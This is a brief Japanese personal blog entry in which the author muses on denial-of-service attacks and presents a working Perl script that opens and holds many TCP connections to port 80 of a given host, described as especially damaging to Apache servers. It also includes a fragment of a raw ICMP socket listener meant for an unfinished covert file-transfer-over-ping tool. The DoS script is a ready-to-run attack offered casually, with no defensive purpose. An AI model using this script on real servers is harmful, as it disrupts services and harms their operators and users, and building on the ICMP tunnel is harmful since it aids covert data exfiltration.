enhydraの日記: DoSいろいろ
DoSは一番美しく無い嫌がらせの一つで、その理由の一つが力任せの攻撃が成り立ち打つ点です。一発でしとめるぜ系の美しい物もありますが、幅を聞かせているのはDDoSに代表される潤沢に計算機リソースを使用した攻撃だったり、個人的に美しいと感じるSmurf attackなど加速器系の手法も結局力任せでエレガントさが欠落してるのが実状です。
今日は仕事をする気が起きなかったので、各手法を実際に実装して遊んでいた。幾つか有効な手法はあるのだが、身元が特定できたとしても一番効率的で個人的にやられてダメージの大きい手法がこれ。
#!perl
use IO::Socket;
my $host = shift;
my $count = shift || 1024;
my @http;
for (1..$count) {
push @http, IO::Socket::INET->new(
PeerHost => $host,
PeerPort => 80,
Proto => 'tcp',
);
}
print 'Please hit any key...';
scalar <>;
__END__
Apache系のhttpdには覿面です。
他にはicmpのパラメータにデータをのせて、「pingが通ればファイル転送できるぜツール」を書いて遊んでいた。(未完成)知らなかったんだけど、icmpのハンドル開くとその全パケットが取得できるのね。libpcap使わないとダメかなーと思ってたら使わないでIO::Socket::INETだけで行けたので安心。
my $icmp = IO::Socket::INET->new(
Proto => 'icmp',
Type => SOCK_RAW,
);
while (1) {
my $chunk;
my $peer = $icmp->recv($chunk, 1500, 0);
}
__END__
ってゆーか仕事しろって。
DoSいろいろ More ログイン